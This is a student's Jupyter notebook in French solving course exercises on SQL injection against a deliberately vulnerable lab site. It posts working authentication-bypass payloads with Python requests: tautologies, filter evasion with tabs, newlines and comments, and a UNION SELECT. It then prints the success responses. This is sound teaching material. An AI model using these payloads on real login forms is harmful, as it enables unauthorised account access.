# ipl I317B Sécurité : labos
## Semaine 2 : Vulnérabilitées web (1)

### Exercice 1:
Pour ce premier exercice, nous vous demandons de passer le formulaire de connexion codé par un mauvais développeur : http://labosecuipl.alwaysdata.net/20/s02/ex1/

In [1]:
import requests

page = requests.post(
    "http://labosecuipl.alwaysdata.net/20/s02/ex1/",
    data={"login": "' or 1=1 or '",
          "password": ""}
)
print(page.text)

if "Good job" in page.text:
    print("Exercice réussi")

<!DOCTYPE html>
<html lang="en">
<p id='result'>Good job, it's time to do the next exercice !</p></html>

Exercice réussi


Pouvez-vous en déduire la syntaxe de la requête SQL présente dans ce formulaire et dans laquelle votre injection fonctionne ?

### Exercice 2a:
Une variante du précédent formulaire a été mit en place, connectez-vous à nouveau à celui-ci : http://labosecuipl.alwaysdata.net/20/s02/ex2a/

In [2]:
import requests

page = requests.post(
    "http://labosecuipl.alwaysdata.net/20/s02/ex2a/",
    data={"login": "\" or 1=1;--",
          "password": ""}
)
print(page.text)

if "Good job" in page.text:
    print("Exercice réussi")

<!DOCTYPE html>
<html lang="en">
<p id='result'>Good job, it's time to do the next exercice !</p></html>

Exercice réussi


### Exercice 2b:
Une variante du précédent formulaire a été mit en place, connectez-vous à nouveau à celui-ci : http://labosecuipl.alwaysdata.net/20/s02/ex2b/

In [3]:
import requests

page = requests.post(
    "http://labosecuipl.alwaysdata.net/20/s02/ex2b/",
    data={"login": "') or 1=1;--",
          "password": ""}
)
print(page.text)

if "Good job" in page.text:
    print("Exercice réussi")

<!DOCTYPE html>
<html lang="en">
<p id='result'>Good job, it's time to do the next exercice !</p></html>

Exercice réussi


NB: sans la ), on obtient l'erreur suivante :

<b>Warning</b>:  PDO::query(): SQLSTATE[HY000]: General error: 1 near &quot;;&quot;: syntax error in <b>/home/labosecuipl/www/20/s02/ex2b/index.php</b> on line <b>12</b><br />

Qui nous indique qu'arriver à la fin de la ligne ";", il y a une erreur de syntaxe. Ça nous aide à deviner qu'il "manque un truc fermant" ...

### Exercice 3:
Dans cette nouvelle version, le développeur semble avoir prit conscience que certains caractères ne devraient pas être accepté ... mais vous êtes plus malin que lui, n'est-ce pas ?

http://labosecuipl.alwaysdata.net/20/s02/ex3/

In [4]:
import requests

page = requests.post(
    "http://labosecuipl.alwaysdata.net/20/s02/ex3/",
    data={
        "login": "\" or 1<>2;--".replace(" ", "\t"),
        "password": ""
    }
)
print(page.text)

if "Good job" in page.text:
    print("Exercice réussi")

<!DOCTYPE html>
<html lang="en">
<p id='result'>Good job, it's time to do the next exercice !</p></html>

Exercice réussi


In [5]:
# Le site semble faire deux checks :
# - pas d'espace
#    Replaçons les espaces par autre chose qui agira de la même manière :
#    \t
#    \n
#    /**/
#
# - pas d'égale ... mais bon, faire quelque chose de toujours vrai c'est simple ...
#    1<2
#    1<>2
#    "1" LIKE "1"
#    NULL IS NULL

for tautologie in ["1<>2", "1<2", '"1" LIKE "1"', "NULL is NULL"]:
    for blankspace in ['\n', '\t', '/**/']:
        
        injection = ("\" or %s;--" % tautologie).replace(" ", blankspace)
        # print("Inject [%s]" % injection, end=" =>")
        
        page = requests.post(
            "http://labosecuipl.alwaysdata.net/20/s02/ex3/",
            data={"login": injection, "password": ""}
        )
        
        if "Good job" in page.text:
            print("ok")
        else:
            print("KO")

ok
ok
ok
ok
ok
ok
ok
ok
ok
ok
ok
ok


### => conclusion, on fait pas ses checks soit même parce qu'il y a pleiiiin de manière de contourner ceux-ci !

### Exercice 4:

Une variante du précédent formulaire a été mit en place, encore une fois, trouvez le moyen de vous y connecter : http://labosecuipl.alwaysdata.net/20/s02/ex4/

In [6]:
from bs4 import BeautifulSoup

s = requests.Session()

page = s.get("http://labosecuipl.alwaysdata.net/20/s02/ex4/")

# la méthode vite&moche
# print(page.text)
# token = page.text.split("value='")[1].split("'")[0]

# la méthode BeautifulSoup
soup = BeautifulSoup(page.text)
token = soup.find("input", {'name': 'token'})['value']

page = s.post(
    "http://labosecuipl.alwaysdata.net/20/s02/ex3/",
    data={"login": "\" or 1<>2;--".replace(" ", "\t"),
          "password": "",
          "token": token}
)

print(page.text)

<!DOCTYPE html>
<html lang="en">
<p id='result'>Good job, it's time to do the next exercice !</p></html>



### Exercice 5:
Un espion sur place m'a confirmé que, ne parvenant pas à circonvenir nos injections, le dévelopeur derrière ce site à juste décidé de vider la base de donnée `users`. Il s'est venté bruyament de sa nouvelle idée à coté de la machine à café :

> "J'ai vidé la base de donnée ! Haha ! La requête sql de connexion ne peut plus renvoyé de login utilisateur donc impossible pour eux de se connecter ! Haha, ces maudits hackers ne m'auront pas cette fois-ci !".

Désormait, toutes les requêtes, même injectée "toujours vraie" sont vide ... C'est embêtant mais je suis sûr qu'on peut arranger le coup !

http://labosecuipl.alwaysdata.net/20/s02/ex5/

In [7]:
import requests

page = requests.post(
    "http://labosecuipl.alwaysdata.net/20/s02/ex5/",
    data={"login": "' UNION SELECT \"hacked\", \"hacked2\";--",
          "password": ""}
)
print(page.text)

if "Good job" in page.text:
    print("Exercice réussi")

<!DOCTYPE html>
<html lang="en">
<p id='result'>Good job, it's time to do the next exercice !</p></html>

Exercice réussi


### Exercice 6a:
Pour ce nouvel exercice, nous allons utiliser un nouveau formulaire. Ce formulaire nous permet de chercher parmi les éléments du tableau périodique des éléments. Par exemple, si vous cherchez "Co*", vous obtiendrez les informations sur le copper (cuivre) et le cobalt.

http://labosecuipl.alwaysdata.net/20/s02/ex6/

Commencez par récupérer le numéro de version de notre base de donnée. Ici, nous connaissonsle type de base de donnée : SQLITE, un petit détour par la documentation nous permet deconnaître la fonction parfait pour cela : https://www.sqlite.org/lang_corefunc.html#sqlite_version.

In [8]:
#TODO
# on y retourne en début de s03

Pouvez-vous en déduire la syntaxe de la requête SQL présente dans ce formulaire et dans laquelle votre injection fonctionne ?

...

### Exercice 6b:
Dans le même ordre d’idée, je vous invite à récupérer la liste des tables présentes dans cette base de donnée.Comme souvent, la lecture de la documentation peut vous faciliter la vie : https://www.sqlite.org/faq.html#q7

In [9]:
#TODO
# on y retourne en début de s03

### Exercice 6c:
Maintenant que vous connaissez toutes les tables dans cette base de données ainsi que le nomde chaque champ, pourquoi ne pas récupérer le contenu de chacune de ces tables ?

In [10]:
#TODO
# on y retourne en début de s03